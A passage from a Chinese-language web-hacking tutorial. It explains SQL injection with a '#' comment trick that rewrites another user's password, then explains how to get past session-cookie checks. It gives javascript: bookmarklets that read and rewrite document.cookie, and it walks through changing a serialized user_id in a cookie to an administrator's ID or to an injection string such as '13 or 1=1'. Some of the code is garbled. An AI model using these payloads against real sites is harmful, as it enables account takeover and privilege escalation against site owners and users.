"UPDATE user_data SET user_password='mypassword',user_email='myemail',user_sex='gay',user_password='HACKED' WHERE
user_id=1 #' WHERE user_id=7382";
"#"这个是sql的注释符.
2.绕过session cookies
绕过基本的session cookie验证
很多情况下会话处理都是采用的cookie.假如页面没有正确处理session cookie,一个攻击者能够利用此缺陷更改自己的用户身份为其他用户.
cookies保存在"window.document.cookie".使用j avascript我们能够擦除,编辑,创建任意站点的cookies.这个要比一般的攻击方式复杂得多.这里我只简单的介绍一下"
查看cookies:
j avascript:alert(unescape(document.cookie));
修改cookies数据:
j avascript:alert(window.c=functiona(n,v,nv){ c=document.cookie;c=c.substring(c.indexOf(n) n.length,c.length);c=c.substring(1,(
(c.indexOf(";")>-1) ? c.indexOf(";") : c.length));nc=unescape(c).replace(v,nv);document.cookie=n "=" escape(nc);return
unescape(document.cookie); });alert(c(prompt("cookie name:",""),prompt("replace this value:",""),prompt("with::","")));
假设您在www.ima13370h4x0r.net以"John Doe"身份登录,您获得的cookie如下:
SessionData=a:3:{ s:11:"SessionUser";s:5:"75959";s:9:"SessionID";i:70202768;s:9:"LastVisit";i:1078367189; }
我们只关心"75959"这个值,因为他是user_id的值.很多时候,您会发现有的站点把一些关键数据(比如user_id)保存在cookie中,这是个很严重的漏洞,因为任何用户都能够修改他们的user_id值为其他用户比如管理员用户的user_id值.
.
一旦您声明了window.c函数后,修改cookie的值就变得容易得多.首先把s:5:"75959"修改为s:x:"ADMINID",其中x是新值的长度.比如,您想把75959改为1,那么您必需把s:5:"75959"改成s:1:"1".有的时候一些站点会使用带WHERE子句的sql查询语句保持用户登录状态这个时候您需要把75959该为类似"13 or 1=1"这样的值.
注意:
嵌入的j avascript声明能够加到您的浏览器的收藏里,这样能够轻轻一点即可.声明您自己的函数用下面的形式:
"alert(window.newfunction = function (){ ... })"
